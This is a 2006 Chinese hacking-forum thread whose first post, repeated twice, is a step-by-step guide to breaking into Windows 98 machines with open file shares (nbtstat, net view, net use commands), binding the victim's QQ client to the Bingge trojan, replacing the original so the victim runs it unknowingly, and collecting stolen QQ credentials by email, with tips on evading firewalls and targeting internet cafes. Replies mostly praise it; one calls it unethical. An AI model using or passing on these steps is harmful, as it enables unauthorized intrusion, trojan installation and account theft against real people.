岁月联盟 - 技术社区 - BBS.SYUE.COM » [ Technical exchanges ] QQ技术交流 » [讨论]入侵后偷QQ号的方法(禁)

syue馨少 发表于 2006-7-17 08:56

[讨论]入侵后偷QQ号的方法(禁)

在命令提示符下（即，win9x的dos命令行下）&nbsp; <br/>输入&nbsp;nbtstat&nbsp;-A&nbsp;xxx.xxx.xxx.xxx&nbsp; <br/>会得到如下提示信息：&nbsp; <br/>NetBios&nbsp;remote&nbsp;machine&nbsp;name&nbsp;table&nbsp; <br/>name&nbsp;__type&nbsp;_________status&nbsp; <br/>clovea&nbsp;&lt;00&gt;&nbsp;unique&nbsp;registered&nbsp; <br/>mmxxcc&nbsp;&lt;00&gt;&nbsp;group&nbsp;registered&nbsp; <br/>clovea&nbsp;&lt;03&gt;&nbsp;unique&nbsp;registered&nbsp; <br/>mac&nbsp;address&nbsp;=&nbsp;00-00-00-00-00-00&nbsp; <br/>这里就告诉了你对方的注册用户名，和主机名&nbsp;均为clovea&nbsp; <br/>mmxxcc为对方注册公司。&nbsp; <br/>第三步，在命令提示符下输入，&nbsp; <br/>net&nbsp;view&nbsp;\\xxx.xxx.xxx.xxx&nbsp; <br/>这时会显示对方的共享资源。&nbsp; <br/>比如&nbsp; <br/>c&nbsp;xx&nbsp;c&nbsp; <br/>说明对方的c盘是共享的。&nbsp; <br/>第四步，接下来输入&nbsp; <br/>net&nbsp;use&nbsp;z:&nbsp;\\xxx.xxx.xxx.xxx\c&nbsp; <br/>这时，你的z:就成为对方c盘的应像了，可以直接用dos命令操作&nbsp; <br/>如copy&nbsp;z:\program&nbsp;files\oicq.exe&nbsp;d:\oicq.exe&nbsp; <br/>也可以到到<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><u><font color="#0000ff">windows</font></u></a>界面，打开我的电脑，直接操作。&nbsp; <br/>第5步，查明对方的常用软件，如oicq，winamp，等等&nbsp; <br/>然后把对方的常用软件和木马进行捆绑，如把oicq.exe&nbsp;和G_sever.exe（冰河2.2服务端)。&nbsp; <br/>第6步，偷梁换柱，把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马，嘿嘿。&nbsp; <br/>第7步，等着你的冰河给你发mail吧，呵呵，不过大家最好还是别用冰河，冰河的万能密码太恐怖了，还有，默认的木马端口一定要记得改啊。&nbsp; <br/>备注，如果对方拥有天网之内的防火墙的话，你是查不到对方的共享资源和信息的。&nbsp; <br/>如果你已经成功的侵入，而又能肯定对方要装防火墙的话，请把木马端口限制在1024以下。&nbsp; <br/>以上方法虽然是利用对方的错误配置等进攻，并且懂点安全知识的都不会共享自己的资源的，但是经我实验证实，有很多网吧为了方便，硬盘都是共享了的，如果对方有路由的话，就先用ip欺骗吧！&nbsp; <br/>首先需要得知对方的ip&nbsp; <br/>可以用oicq来查对方ip，也可以在聊天室内查。&nbsp; <br/>工具很多，随便都可以抓到一大把。&nbsp; <br/>第二步，在命令提示符下（即，win9x的dos命令行下）&nbsp; <br/>输入&nbsp;nbtstat&nbsp;-A&nbsp;xxx.xxx.xxx.xxx&nbsp; <br/>会得到如下提示信息：&nbsp; <br/>NetBios&nbsp;remote&nbsp;machine&nbsp;name&nbsp;table&nbsp; <br/>name&nbsp;__type&nbsp;_________status&nbsp; <br/>clovea&nbsp;&lt;00&gt;&nbsp;unique&nbsp;registered&nbsp; <br/>mmxxcc&nbsp;&lt;00&gt;&nbsp;group&nbsp;registered&nbsp; <br/>clovea&nbsp;&lt;03&gt;&nbsp;unique&nbsp;registered&nbsp; <br/>mac&nbsp;address&nbsp;=&nbsp;00-00-00-00-00-00&nbsp; <br/>这里就告诉了你对方的注册用户名，和主机名&nbsp;均为clovea&nbsp; <br/>mmxxcc为对方注册公司。&nbsp; <br/>第三步，在命令提示符下输入，&nbsp; <br/>net&nbsp;view&nbsp;\\xxx.xxx.xxx.xxx&nbsp; <br/>这时会显示对方的共享资源。&nbsp; <br/>比如&nbsp; <br/>c&nbsp;xx&nbsp;c&nbsp; <br/>说明对方的c盘是共享的。&nbsp; <br/>第四步，接下来输入&nbsp; <br/>net&nbsp;use&nbsp;z:&nbsp;\\xxx.xxx.xxx.xxx\c&nbsp; <br/>这时，你的z:就成为对方c盘的应像了，可以直接用dos命令操作&nbsp; <br/>如copy&nbsp;z:\program&nbsp;files\oicq.exe&nbsp;d:\oicq.exe&nbsp; <br/>也可以到到<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><u><font color="#0000ff">windows</font></u></a>界面，打开我的电脑，直接操作。&nbsp; <br/>第5步，查明对方的常用软件，如oicq，winamp，等等&nbsp; <br/>然后把对方的常用软件和木马进行捆绑，如把oicq.exe&nbsp;和G_sever.exe（冰河2.2服务端)。&nbsp; <br/>第6步，偷梁换柱，把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马，嘿嘿。&nbsp; <br/>第7步，等着你的冰河给你发mail吧，呵呵，不过大家最好还是别用冰河，冰河的万能密码太恐怖了，还有，默认的木马端口一定要记得改啊。备注，如果对方拥有天网之内的防火墙的话，你是查不到对方的共享资源和信息的。&nbsp; <br/>如果你已经成功的侵入，而又能肯定对方要装防火墙的话，请把木马端口限制在1024以下。&nbsp; <br/><br/>以上方法虽然是利用对方的错误配置等进攻，并且懂点安全知识的都不会共享自己的资源的，但是经我实验证实，有很多网吧为了方便，硬盘都是共享了的，如果对方有路由的话，就先用ip欺骗吧！

tianxun 发表于 2006-7-20 05:40

厉害哦，值得学习哦

Syue锁锁 发表于 2006-7-22 16:39

学习下

naizi 发表于 2006-11-23 05:57

看来没安全可言喔！

三少爷的剑 发表于 2006-11-23 09:26

<p>厉害````</p>

bocai890 发表于 2006-11-30 15:32

学习~只能在win98下管用吗?

zlt 发表于 2006-12-1 04:51

太强了

yzhuhu 发表于 2006-12-2 09:02

学习···

yzhuhu 发表于 2006-12-2 09:13

继续学习··

yzhuhu 发表于 2006-12-3 06:33

<p>还要学习··</p><p>貌似 现在98 的··</p><p>很少用··</p>

jydyd 发表于 2006-12-6 08:36

不断学习

feox 发表于 2006-12-6 19:24

着不道德吧。。。。。。。。。。。。。。。。。

yzy888 发表于 2006-12-7 03:05

<p>学习一下，顶了</p>

awen 发表于 2006-12-10 20:02

<p>复制下来,先去学好基础再看</p>

土豆之梦 发表于 2006-12-14 18:48

难了点

大陆鬼鬼 发表于 2006-12-16 01:18

嘿嘿。学习学习吧

向左向右 发表于 2006-12-16 18:35

看不懂！

查看完整版本: [讨论]入侵后偷QQ号的方法(禁)